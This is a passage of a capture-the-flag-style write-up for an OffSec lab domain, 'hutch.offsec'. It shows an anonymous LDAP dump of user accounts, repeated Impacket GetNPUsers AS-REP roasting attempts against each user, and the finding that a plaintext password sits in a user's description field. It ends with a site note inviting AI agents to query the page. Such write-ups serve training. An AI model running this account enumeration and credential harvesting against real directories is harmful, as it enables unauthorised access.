agitthouse sAMAccountType: 805306368 userPrincipalName: agitthouse@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z # Freddy McSorley, Users, hutch.offsec dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Freddy McSorley description: Password set to CrabSharkJellyfish192 at user's request. Please c hange on next login. distinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec instanceType: 4 whenCreated: 20201104053505.0Z whenChanged: 20210216133934.0Z uSNCreated: 12831 uSNChanged: 49179 name: Freddy McSorley objectGUID:: TxilGIhMVkuei6KplCd8ug== userAccountControl: 66048 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 132489437036308102 lastLogoff: 0 lastLogon: 132579563744834908 pwdLastSet: 132489417058152751 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA== accountExpires: 9223372036854775807 logonCount: 2 sAMAccountName: fmcsorley sAMAccountType: 805306368 userPrincipalName: fmcsorley@hutch.offsec objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec dSCorePropagationData: 20201104053513.0Z dSCorePropagationData: 16010101000001.0Z lastLogonTimestamp: 132579563744834908 msDS-SupportedEncryptionTypes: 0 # Domain Administrator, Users, hutch.offsec dn: CN=Domain Administrator,CN=Users,DC=hutch,DC=offsec # search reference ref: ldap://ForestDnsZones.hutch.offsec/DC=ForestDnsZones,DC=hutch,DC=offsec # search reference ref: ldap://DomainDnsZones.hutch.offsec/DC=DomainDnsZones,DC=hutch,DC=offsec # search reference ref: ldap://hutch.offsec/CN=Configuration,DC=hutch,DC=offsec # search result search: 2 result: 0 Success # numResponses: 42 # numEntries: 38 # numReferences: 3 ``` Tried to AESPROAST ``` ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/rplacidi -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for rplacidi [-] User rplacidi doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/opatry -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for opatry [-] User opatry doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/ltaunton -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for ltaunton [-] User ltaunton doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/acostello -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for acostello [-] User acostello doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/jsparwell -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for jsparwell [-] User jsparwell doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/oknee -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for oknee [-] User oknee doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/jmckendry -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for jmckendry [-] User jmckendry doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/avictoria -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for avictoria [-] User avictoria doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/jfrarey -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for jfrarey [-] User jfrarey doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/eaburrow -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for eaburrow [-] User eaburrow doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/cluddy -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for cluddy [-] User cluddy doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/agitthouse -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for agitthouse [-] User agitthouse doesn't have UF_DONT_REQUIRE_PREAUTH set ╭─    /home/kali/impacket/examples    master ?31 ▓▒░───────────────────────────────────░▒▓ ✔  root@kali  ╰─ GetNPUsers.py hutch.offsec/fmcsorley -no-pass /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release. Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Getting TGT for fmcsorley [-] User fmcsorley doesn't have UF_DONT_REQUIRE_PREAUTH set ``` Actually in the description description: Password set to CrabSharkJellyfish192 at user's request. This was for the user fmcsorley --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lyethar.gitbook.io/hutch/enumeration/other-services/ldap.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.